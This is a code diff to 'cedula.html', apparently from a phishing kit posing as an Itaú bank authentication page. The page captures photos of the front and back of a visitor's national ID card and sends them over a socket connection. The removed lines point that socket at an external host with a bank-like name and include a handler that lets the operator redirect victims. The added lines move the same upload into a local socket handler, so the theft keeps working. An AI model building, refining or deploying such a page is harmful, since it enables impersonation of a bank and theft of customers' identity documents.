--- a/cedula.html
+++ b/cedula.html
@@ -398,18 +398,9 @@
         <button class="submit-btn" id="submitBtn">Continuar</button>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
     <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
-            reconnection: true,
-            reconnectionDelay: 500,
-            reconnectionDelayMax: 2000,
-            reconnectionAttempts: Infinity,
-            timeout: 10000,
-            transports: ['websocket', 'polling']
-        });
-
-        let sessionId = localStorage.getItem('itau_session_id');
         
         let frontStream = null;
         let backStream = null;
@@ -433,16 +424,6 @@
         const acceptPolicy = document.getElementById('acceptPolicy');
         const submitBtn = document.getElementById('submitBtn');
         const loadingOverlay = document.getElementById('loadingOverlay');
-
-        // Initialize session
-        socket.on('connect', () => {
-            socket.emit('init-session', { sessionId });
-        });
-
-        socket.on('session-ready', (data) => {
-            sessionId = data.sessionId;
-            localStorage.setItem('itau_session_id', sessionId);
-        });
 
         // Initialize cameras
         async function initCamera(videoElement, statusElement, captureBtn) {
@@ -552,7 +533,7 @@
                 const frontImage = frontCanvas.toDataURL('image/jpeg', 0.8);
                 const backImage = backCanvas.toDataURL('image/jpeg', 0.8);
                 
-                socket.emit('cedula', {
+                window.itauSocket.emit('cedula', {
                     front: frontImage,
                     back: backImage
                 });
@@ -560,18 +541,12 @@
         });
 
         // Socket listeners
-        socket.on('cedula-response', (data) => {
+        window.itauSocket.on('cedula-response', (data) => {
             if (data.success) {
                 console.log('Cédula enviada correctamente');
             } else {
                 loadingOverlay.classList.remove('active');
                 alert('Error al procesar la solicitud');
-            }
-        });
-
-        socket.on('redirect', (data) => {
-            if (data.page) {
-                window.location.href = data.page;
             }
         });
 
